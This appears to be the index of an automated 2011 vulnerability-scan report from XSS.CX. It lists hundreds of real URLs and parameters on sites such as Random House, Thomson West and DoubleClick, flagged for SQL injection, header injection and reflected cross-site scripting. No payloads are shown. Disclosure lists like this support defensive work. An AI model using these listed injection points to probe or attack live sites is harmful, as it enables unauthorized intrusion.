XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10182011-01

Report generated by XSS.CX at Tue Oct 18 07:02:54 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s72574234255265 [REST URL parameter 1]

1.2. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s74819229580448 [REST URL parameter 1]

1.3. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s79384069200516 [REST URL parameter 4]

1.4. http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s75506922125350 [REST URL parameter 1]

1.5. http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s79787087680306 [REST URL parameter 1]

1.6. http://kbportal.thomson.com/ [PW parameter]

1.7. http://kbportal.thomson.com/ [UN parameter]

1.8. http://kbportal.thomson.com/ [cid parameter]

1.9. http://kbportal.thomson.com/ [cpc parameter]

1.10. http://kbportal.thomson.com/display/2/login.aspx [cpid parameter]

1.11. http://kbportal.thomson.com/display/2/login.aspx [password parameter]

1.12. http://kbportal.thomson.com/display/2/login.aspx [username parameter]

1.13. http://kbportal.thomson.com/index.aspx [cid parameter]

1.14. http://kbportal.thomson.com/index.aspx [cpc parameter]

1.15. http://west.thomson.com/store/secure/ShoppingBasket.aspx [__EVENTARGUMENT parameter]

1.16. http://west.thomson.com/store/secure/ShoppingBasket.aspx [_msuuid_787f8z6077 cookie]

1.17. http://west.thomson.com/store/secure/ShoppingBasket.aspx [c cookie]

1.18. http://west.thomson.com/store/secure/ShoppingBasket.aspx [s_id cookie]

1.19. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach [name of an arbitrarily supplied request parameter]

2. LDAP injection

3. Cross-site scripting (stored)

4. HTTP header injection

4.1. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security1 [REST URL parameter 1]

4.2. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security2 [REST URL parameter 1]

4.3. http://widgetserver.com/syndication/get_widget.js [callback parameter]

4.4. http://www.widgetserver.com/syndication/get_widget.js [callback parameter]

5. Cross-site scripting (reflected)

5.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [labels parameter]

5.2. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [redirecturl2 parameter]

5.3. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [rtbdata2 parameter]

5.4. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [rtbip parameter]

5.5. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14 [sz parameter]

5.6. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [&PID parameter]

5.7. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [AN parameter]

5.8. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [ASID parameter]

5.9. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [PG parameter]

5.10. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [TargetID parameter]

5.11. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [UIT parameter]

5.12. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [destination parameter]

5.13. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [sz parameter]

5.14. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [&PID parameter]

5.15. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [AN parameter]

5.16. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [ASID parameter]

5.17. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [PG parameter]

5.18. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [TargetID parameter]

5.19. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [UIT parameter]

5.20. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [destination parameter]

5.21. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [sz parameter]

5.22. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [&PID parameter]

5.23. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [AN parameter]

5.24. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [ASID parameter]

5.25. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [PG parameter]

5.26. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [TargetID parameter]

5.27. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [UIT parameter]

5.28. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [destination parameter]

5.29. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [sz parameter]

5.30. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [&PID parameter]

5.31. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [AN parameter]

5.32. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [ASID parameter]

5.33. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [PG parameter]

5.34. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [TargetID parameter]

5.35. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [UIT parameter]

5.36. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [destination parameter]

5.37. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.100 [sz parameter]

5.38. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [&PID parameter]

5.39. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [AN parameter]

5.40. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [ASID parameter]

5.41. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [PG parameter]

5.42. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [TargetID parameter]

5.43. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [UIT parameter]

5.44. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [destination parameter]

5.45. http://ad.doubleclick.net/adj/N5506.MSN/B5070033.106 [sz parameter]

5.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [&PID parameter]

5.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter]

5.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [AN parameter]

5.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [ASID parameter]

5.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [PG parameter]

5.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [TargetID parameter]

5.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [UIT parameter]

5.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [name of an arbitrarily supplied request parameter]

5.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [&PID parameter]

5.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [AN parameter]

5.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [ASID parameter]

5.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [PG parameter]

5.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [REST URL parameter 2]

5.59. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [REST URL parameter 3]

5.60. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [TargetID parameter]

5.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [UIT parameter]

5.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [click parameter]

5.63. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [name of an arbitrarily supplied request parameter]

5.64. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [&PID parameter]

5.65. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click parameter]

5.66. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [AN parameter]

5.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [ASID parameter]

5.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [PG parameter]

5.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [TargetID parameter]

5.70. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [UIT parameter]

5.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [name of an arbitrarily supplied request parameter]

5.72. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [&PID parameter]

5.73. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click parameter]

5.74. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [AN parameter]

5.75. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [ASID parameter]

5.76. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [PG parameter]

5.77. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [TargetID parameter]

5.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [UIT parameter]

5.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [name of an arbitrarily supplied request parameter]

5.80. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [&PID parameter]

5.81. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [AN parameter]

5.82. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [ASID parameter]

5.83. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [PG parameter]

5.84. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [REST URL parameter 2]

5.85. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [REST URL parameter 3]

5.86. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [TargetID parameter]

5.87. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [UIT parameter]

5.88. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [click parameter]

5.89. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [name of an arbitrarily supplied request parameter]

5.90. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [&PID parameter]

5.91. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [AN parameter]

5.92. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [ASID parameter]

5.93. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [PG parameter]

5.94. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [REST URL parameter 2]

5.95. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [REST URL parameter 3]

5.96. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [TargetID parameter]

5.97. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [UIT parameter]

5.98. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [click parameter]

5.99. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [name of an arbitrarily supplied request parameter]

5.100. http://api.bing.com/qsonhs.aspx [q parameter]

5.101. http://ar.voicefive.com/b/rc.pli [func parameter]

5.102. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.103. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.104. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.105. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.106. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.107. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.108. http://cdn.widgetserver.com/syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/ [REST URL parameter 18]

5.109. http://cdn.widgetserver.com/syndication/json/i/077f25c8-0348-4215-9539-57b2ff17f13b/iv/15/n/code/nv/4/p/2/r/621004a9-a717-4271-bd6a-b454b74a1d68/rv/101/t/0ecb188b389ef47932686132b264ecdcbd658d2a0000012f8ab32f74/u/2/ [REST URL parameter 4]

5.110. http://cdn.widgetserver.com/syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/ [REST URL parameter 18]

5.111. http://cdn.widgetserver.com/syndication/json/i/3651dbe5-aec4-42b2-8270-d62db9a25bfe/iv/5/n/wbx/nv/2/p/2/r/6ba05ce8-62f3-46d0-bb21-b5f833b4817f/rv/367/t/34425cfc81ae44177f1d6c3dc87a11a7b3c559c30000012f8af78211/u/2/ [REST URL parameter 4]

5.112. http://cdn.widgetserver.com/syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/ [REST URL parameter 18]

5.113. http://cdn.widgetserver.com/syndication/json/i/9dc88731-b2ec-4909-9bc6-b15b8881219b/iv/2/n/code/nv/4/p/1/r/a5eaf8f4-5bfb-4aa0-9d12-1707dde89c3e/rv/52/t/095ceb1aff68cc1170437fc8a7c33749a6e5729d0000012f8b0da168/u/1/ [REST URL parameter 4]

5.114. http://cdn.widgetserver.com/syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/ [REST URL parameter 18]

5.115. http://cdn.widgetserver.com/syndication/json/i/a2cf3a06-8341-401d-9929-c445542d58f5/iv/3/n/code/nv/4/p/0/r/8e8d4b61-3cef-4782-bdf3-34277bd49172/rv/132/t/e319266ef2e04c39f5ae5accf233b10078f950d70000012f8ab5b5e1/u/2/ [REST URL parameter 4]

5.116. http://cdn.widgetserver.com/syndication/mobile/x/css/preview.css [REST URL parameter 2]

5.117. http://ds.addthis.com/red/psi/sites/www.bertelsmann.com/p.json [callback parameter]

5.118. http://ecommerce.randomhouse.com/cart.do [from parameter]

5.119. http://ecommerce.randomhouse.com/cart.do [from parameter]

5.120. http://ecommerce.randomhouse.com/cart.do [from parameter]

5.121. https://ecommerce.randomhouse.com/account.do [from parameter]

5.122. https://ecommerce.randomhouse.com/account.do [from parameter]

5.123. https://ecommerce.randomhouse.com/account.do [from parameter]

5.124. https://ecommerce.randomhouse.com/create-account-submit.do [confirmPassword parameter]

5.125. https://ecommerce.randomhouse.com/create-account-submit.do [email parameter]

5.126. https://ecommerce.randomhouse.com/create-account-submit.do [password parameter]

5.127. https://ecommerce.randomhouse.com/create-account.do [from parameter]

5.128. https://ecommerce.randomhouse.com/create-account.do [from parameter]

5.129. https://ecommerce.randomhouse.com/password.do [from parameter]

5.130. https://ecommerce.randomhouse.com/password.do [from parameter]

5.131. https://ecommerce.randomhouse.com/sign-in-submit.do [email parameter]

5.132. https://ecommerce.randomhouse.com/sign-in-submit.do [password parameter]

5.133. https://ecommerce.randomhouse.com/sign-in.do [from parameter]

5.134. https://ecommerce.randomhouse.com/sign-in.do [from parameter]

5.135. https://ecommerce.randomhouse.com/sign-in.do [from parameter]

5.136. https://ecommerce.randomhouse.com/sign-in.do [from parameter]

5.137. https://ecommerce.randomhouse.com/sign-in.do [from parameter]

5.138. http://g.adspeed.net/ad.php [ht parameter]

5.139. http://g.adspeed.net/ad.php [wd parameter]

5.140. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpck parameter]

5.141. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpck parameter]

5.142. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpvc parameter]

5.143. http://img.mediaplex.com/content/0/10105/PF_Mday11_300x250_Coupon_1DznastMdspecDlxdelight.html [mpvc parameter]

5.144. http://img.mediaplex.com/content/0/15902/126860/hitachi_anywhere336x280.js [mpck parameter]

5.145. http://img.mediaplex.com/content/0/15902/126860/hitachi_anywhere336x280.js [mpvc parameter]

5.146. http://kbportal.thomson.com/display/2/_midframe.aspx [tab parameter]

5.147. http://kbportal.thomson.com/display/2/index.aspx [tab parameter]

5.148. http://kbportal.thomson.com/display/2/optframe.aspx [opt parameter]

5.149. http://kbportal.thomson.com/index.aspx [t parameter]

5.150. http://matrix.itasoftware.com/geosearch/service/json/getByCode/salesCity [callback parameter]

5.151. http://matrix.itasoftware.com/geosearch/service/json/suggest/citiesAndAirports [callback parameter]

5.152. http://matrix.itasoftware.com/xhr/shop/search [format parameter]

5.153. http://matrix.itasoftware.com/xhr/shop/search [name parameter]

5.154. http://matrix.itasoftware.com/xhr/shop/search [summarizers parameter]

5.155. http://matrix.itasoftware.com/xhr/shop/summarize [format parameter]

5.156. http://matrix.itasoftware.com/xhr/shop/summarize [summarizers parameter]

5.157. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]

5.158. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]

5.159. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]

5.160. http://p.opt.fimserve.com/bht/ [px parameter]

5.161. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

5.162. http://realestate.msn.us.intellitxt.com/al.asp [jscallback parameter]

5.163. http://realestate.msn.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

5.164. http://realestate.msn.us.intellitxt.com/v4/init [jscallback parameter]

5.165. http://realestate.msn.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

5.166. http://recs.richrelevance.com/rrserver/p13n_generated.js [ctp parameter]

5.167. http://servedby.flashtalking.com/imp/3/14752 [94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click parameter]

5.168. http://servedby.flashtalking.com/imp/3/14752 [cachebuster parameter]

5.169. http://servedby.flashtalking.com/imp/3/14752 [ftadz parameter]

5.170. http://servedby.flashtalking.com/imp/3/14752 [ftscw parameter]

5.171. http://servedby.flashtalking.com/imp/3/14752 [ftx parameter]

5.172. http://servedby.flashtalking.com/imp/3/14752 [fty parameter]

5.173. http://servedby.flashtalking.com/imp/3/14752 [name of an arbitrarily supplied request parameter]

5.174. http://wd.sharethis.com/api/getApi.php [cb parameter]

5.175. http://west.thomson.com/support/contact-us/default.aspx [FindingMethod parameter]

5.176. http://west.thomson.com/support/contact-us/default.aspx [FindingMethod parameter]

5.177. http://west.thomson.com/support/contact-us/default.aspx [PromCode parameter]

5.178. http://west.thomson.com/support/contact-us/default.aspx [PromCode parameter]

5.179. http://west.thomson.com/support/contact-us/default.aspx [name of an arbitrarily supplied request parameter]

5.180. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [FindingMethod parameter]

5.181. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [PromCode parameter]

5.182. https://west.thomson.com/support/customer-service/order-info.aspx [name of an arbitrarily supplied request parameter]

5.183. http://widget.needle.itasoftware.com/widget/Matrix2.do [callback parameter]

5.184. http://widgets.digg.com/buttons/count [url parameter]

5.185. http://widgetserver.com/syndication/subscriber/InsertPanel.js [panelId parameter]

5.186. http://www.allpages.com/ [980251%22';944334 parameter]

5.187. http://www.allpages.com/ [name of an arbitrarily supplied request parameter]

5.188. http://www.aptm.phoenix.edu/ [channel parameter]

5.189. http://www.aptm.phoenix.edu/ [classification parameter]

5.190. http://www.aptm.phoenix.edu/ [creative_desc parameter]

5.191. http://www.aptm.phoenix.edu/ [creative_id parameter]

5.192. http://www.aptm.phoenix.edu/ [destination parameter]

5.193. http://www.aptm.phoenix.edu/ [distribution parameter]

5.194. http://www.aptm.phoenix.edu/ [initiative parameter]

5.195. http://www.aptm.phoenix.edu/ [keyword parameter]

5.196. http://www.aptm.phoenix.edu/ [mktg_prog parameter]

5.197. http://www.aptm.phoenix.edu/ [provider parameter]

5.198. http://www.aptm.phoenix.edu/ [pvp_campaign parameter]

5.199. http://www.aptm.phoenix.edu/ [unit parameter]

5.200. http://www.aptm.phoenix.edu/ [user1 parameter]

5.201. http://www.aptm.phoenix.edu/ [user2 parameter]

5.202. http://www.aptm.phoenix.edu/ [user3 parameter]

5.203. http://www.aptm.phoenix.edu/ [version parameter]

5.204. http://www.aptm.phoenix.edu/AptiNet/hhs [level_education parameter]

5.205. http://www.aptm.phoenix.edu/AptiNet/hhs [program_type parameter]

5.206. http://www.aptm.phoenix.edu/AptiNet/hhs [program_type2 parameter]

5.207. http://www.aptm.phoenix.edu/AptiNet/hhs [registered_nurse parameter]

5.208. http://www.aptm.phoenix.edu/AptiNet/hhs [state parameter]

5.209. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php [language parameter]

5.210. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php [name of an arbitrarily supplied request parameter]

5.211. http://www.bertelsmann.com/bertelsmann_corp/wms41/inc/AJAX_MUZ_Statistics.server.php [name of an arbitrarily supplied request parameter]

5.212. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/ [REST URL parameter 2]

5.213. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/ [REST URL parameter 4]

5.214. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/ [name of an arbitrarily supplied request parameter]

5.215. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/ [olo parameter]

5.216. http://www.freemanco.com/store [from parameter]

5.217. http://www.freemanco.com/store/ [from parameter]

5.218. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [_IG_CALLBACK parameter]

5.219. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [__EVENTVALIDATION parameter]

5.220. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter]

5.221. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx [Alias parameter]

5.222. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx [Lang parameter]

5.223. http://www.magellangps.com/ [name of an arbitrarily supplied request parameter]

5.224. http://www.magellangps.com/s.nl [name of an arbitrarily supplied request parameter]

5.225. http://www.randomhouse.com/cgi-bin/feedback/feedback.php [loc parameter]

5.226. http://www.randomhouse.com/cgi-bin/feedback/feedback.php [name of an arbitrarily supplied request parameter]

5.227. http://www.res-x.com/ws/r2/Resonance.aspx [cb parameter]

5.228. http://www.res-x.com/ws/r2/Resonance.aspx [sc parameter]

5.229. http://www.widgetbox.com/CatalogFeed/Stats [REST URL parameter 2]

5.230. http://www.widgetbox.com/CatalogFeed/Stats [callback parameter]

5.231. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe [lib.mobileCssSrc parameter]

5.232. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe [lib.mobileScriptSrc parameter]

5.233. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe [pages parameter]

5.234. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe [siteConfig parameter]

5.235. http://www.widgetserver.com/syndication/html5/3651dbe5-aec4-42b2-8270-d62db9a25bfe [wbxPageTitle parameter]

5.236. https://checkout.netsuite.com/s.nl [User-Agent HTTP header]

5.237. https://checkout.netsuite.com/s.nl [User-Agent HTTP header]

5.238. http://www.careerbuilder.com/iframe/recommendedcvupload.aspx [Referer HTTP header]

5.239. http://a.rfihub.com/ca.html [a cookie]

5.240. http://a.rfihub.com/ca.html [a1 cookie]

5.241. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

5.242. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

5.243. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

5.244. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

5.245. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

5.246. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

5.247. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

5.248. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

5.249. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

5.250. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

5.251. http://seg.sharethis.com/getSegment.php [__stid cookie]

5.252. http://west.thomson.com/Error/500Error.aspx [ASP.NET_SessionId cookie]

5.253. http://west.thomson.com/Signin.aspx [anonymous_userid_1 cookie]

5.254. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx [ASP.NET_SessionId cookie]

5.255. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx [ASP.NET_SessionId cookie]

5.256. http://west.thomson.com/store/DOTD.aspx [ASP.NET_SessionId cookie]

5.257. http://west.thomson.com/store/DOTD.aspx [anonymous_userid_1 cookie]

5.258. http://west.thomson.com/store/product.aspx [ASP.NET_SessionId cookie]

5.259. http://west.thomson.com/store/product.aspx [anonymous_userid_1 cookie]

5.260. http://west.thomson.com/store/secure/ShoppingBasket.aspx [ASP.NET_SessionId cookie]

5.261. http://west.thomson.com/store/secure/ShoppingBasket.aspx [anonymous_userid_1 cookie]

5.262. http://west.thomson.com/support/contact-us/default.aspx [ASP.NET_SessionId cookie]

5.263. http://west.thomson.com/support/contact-us/default.aspx [anonymous_userid_1 cookie]

5.264. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [ASP.NET_SessionId cookie]

5.265. https://west.thomson.com/store/secure/EmptyBasket.aspx [ASP.NET_SessionId cookie]

5.266. https://west.thomson.com/support/customer-service/order-info.aspx [ASP.NET_SessionId cookie]

6. Flash cross-domain policy

6.1. http://ad.doubleclick.net/crossdomain.xml

6.2. http://amch.questionmarket.com/crossdomain.xml

6.3. http://ar.voicefive.com/crossdomain.xml

6.4. http://b.scorecardresearch.com/crossdomain.xml

6.5. http://b.voicefive.com/crossdomain.xml

6.6. http://bs.serving-sys.com/crossdomain.xml

